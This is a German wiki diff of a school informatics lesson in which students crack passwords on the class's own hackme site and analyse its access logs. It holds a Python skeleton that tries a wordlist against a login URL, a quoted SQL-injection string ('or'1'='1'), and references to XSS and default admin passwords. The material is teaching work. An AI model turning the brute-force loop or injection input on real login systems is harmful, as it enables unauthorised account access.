Differences

This shows you the differences between two versions of the page.

--- lehrkraefte:blc:informatik:glf19:hackme:hackme [2020/03/27 11:06]
Ivo Blöchliger [XSS]
+++ lehrkraefte:blc:informatik:glf19:hackme:hackme [2020/04/21 13:53] (current)
Ivo Blöchliger [Häufigste Passwörter]
@@ Line 1: / Line 1: @@
 ====== Hacken Sie! ======
-===== Schlechte Passwörter, ungesicherte Server =====
+===== Log-File Analyse, Aufgaben für den 20./21. April =====
+  * Laden Sie Log-Datei von Teams (in den Aufgaben) herunter.
+  * Bearbeiten Sie die Datei auf Ihrem Gerät.
+  * Geben Sie die Datei in Teams bei der Aufgabe hoch.
+==== Häufigste Passwörter ====
+Erstellen Sie eine Spalte mit den ausprobierten Passwörtern, wobei jedes nur einmal vorkommen darf. In der Spalte daneben soll angegeben werden, wie viele Male das Passwort probiert worden ist. Sortieren Sie dann die Liste nach der Anzahl Versuche.
+Kopieren Sie die beiden Spalten in ein zweites Tabellenblatt und erklären Sie dort kurz, wie sie vorgegangen sind und verlinken Sie benutzte Hilfeseiten und/oder -Videos.
+Wenn Sie das Sortieren und Zählen nicht selber ergoogeln können, gibt es [[https://fginfo.ksbg.ch/~ivo/videos/informatik/excel/Excel-Passwoerter-Haeufigkeiten-mit-Pivot-Tabelle.mp4|hier ein Video]], das die Aufgabe mit einer Pivot-Tabelle löst.
+==== Anzahl Teilnehmer ====
+Wie viele Teilnehmer stellen Sie in betrachteten Zeitrahmen fest? Wie viele Schüler haben mindestens "geschwänzt", wenn man davon ausgeht, dass auch noch zwei Lehrkräfte mit der Hackme-Seite "gespielt" haben?
+==== Nur 2iW ====
+  * Es findet sich ein UserAgent (Browser, oder sonstiges Programm, das auf eine Webseite zugreift) "WhatsApp". Studieren Sie die Zugriffe des Agents. Was stellen Sie fest? Was ist da wohl passiert? Mit welchen weiteren Browsern (Agents) war diese Person auch noch unterwegs? Wie lange hat diese gebraucht, um die erste Challenge zu lösen?
+  * Studieren Sie den Verlauf der Person mit der IP 192.168.1.18
+    * Die Person hat das Passwort '''or'1'='1'' ausprobiert. Hat jemand eine Erklärung dafür?
+  * Können Sie einzelne IPs Ihren Klassenkameraden zuordnen?
+==== Nur 2iW ====
+  * Jemand hat eine Wörterbuch-Attacke gefahren. Welche IP hatte diese Person? Welche Programmiersprache wurde für die Attacke benutzt? Welches war wohl das Passwort? Überprüfen Sie das Passwort.
+  * Bei einigen Einträgen steht "SnapChat" als Agent (Browser, bzw. Programm, mit dem auf die Webseite zugegriffen wird). Argumentieren Sie, ob diese Zugriffe von einem Schülergerät oder von den Servern von Snap-Chat erfolgt sind.
+===== Schlechte Passwörter, ungesicherte Server (30./31. März) =====
 Ihr Ziel ist es, die Passwörter zu knacken. Dazu gibt es 4 Challenges, wobei die letzte wohl nur auf einem richtigen Computer gelöst werden kann.
+**Wichtig: Verwenden Sie keine eigenen Passwörter für die Übung! Die werden alle im Klartext übermittelt gehen unverschlüsselt in die Server-Logs...**
 Die Challenges müssen in der Reihenfolge gelöst werden. Bei der Lösung einer Challenge erhalten Sie den Link auf die nächste Challenge. Wenn Sie eine Challenge gelöst haben, kopieren Sie die URL (das was in der Adresszeile vom Browser steht) in das Abgabe Word-Dokument auf Teams.
@@ Line 8: / Line 39: @@
 ==== Infos zu Challenge 1 ====
+Wir möchten uns natürlich nicht als einfacher User, sondern als Benutzer mit Administrator-Rechten einloggen...
 <hidden>
-So praktisch Standardpasswörter bei der Inbetriebnahme auch sind, diese müssen unbedingt geändert werden.
+So praktisch Standardpasswörter bei der Inbetriebnahme auch sind, diese müssen unbedingt geändert werden. Insbesondere für den Benutzer //admin//.
+Mehr zu Standardpasswörtern: https://www.computerweekly.com/de/definition/Standardpasswort-Default-password
 </hidden>
 ==== Infos zu Challenge 2 ====
@@ Line 31: / Line 65: @@
 import urllib
+# Dowload einer url (ohne https://tech-lab.ch)
+# z.B. /hackme/c4.php?user=hans&pass=muster
+def download(url):
+    host = "tech-lab.ch"
+    port = 443
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host , port))
+    s = ssl.wrap_socket(s)
+    request = "GET " + url + " HTTP/1.1\r\nHost: " + host + "\r\n\r\n"
+    s.sendall(request)
+    reply = s.recv(4096)
+    s.close()
+    return reply
+# Passwoerter einlesen
 file1 = open('john.txt', 'r')
 pws = map(lambda x : urllib.quote(x.rstrip()), file1.readlines())
 file1.close()
-# Alle Passwoerter durchprobieren
-for pw in pws:
+# Passwoerter alle durchgehen
-  # hier was mit pw tun...
+for pw in pws:
-</code>
+    # Die URL ist zu vervollstaendigen (aus einem login-Versuch kopieren)
+    url = "/hackme/c4.php..... " + pw + "....."
-Um zu überprüfen, ob das login fehlgeschlagen hat, kann z.B. folgendes verwendet werden:
-<code python>
+    print(url)
-if "Passwort falsch" in reply:
+    # Den HTML-Code vom login-Versuch herunterladen
-   print("Password "+pw+" ist falsch")
+    reply = download(url)
-else:
-   print(pw+" ist das gesuchte Passwort")
+    # HTML-Code analysieren:
-   exit()  # Programm beenden
+    if not ("Passwort falsch" in reply):
+        print("Hooray! "+pw)
+        exit()
+    else:
+        print("nope "+pw);
+    exit()  # Nur ein Versuch, bis alles richtig läuft... dann diese Zeile loeschen
 </code>
 </hidden>
@@ Line 64: / Line 119: @@
 Kopieren Sie die Ihre verschiedenen URLs, die den XSS-Angriff demonstrieren in das Word-Dokument, das Sie auf Teams abgeben.
+==== Weitere Ideen ====
+<hidden nur Notizen für die Lehrkräfte>
+  * Office-Macros: https://www.youtube.com/watch?v=2tVE79T09Zg
+</hidden>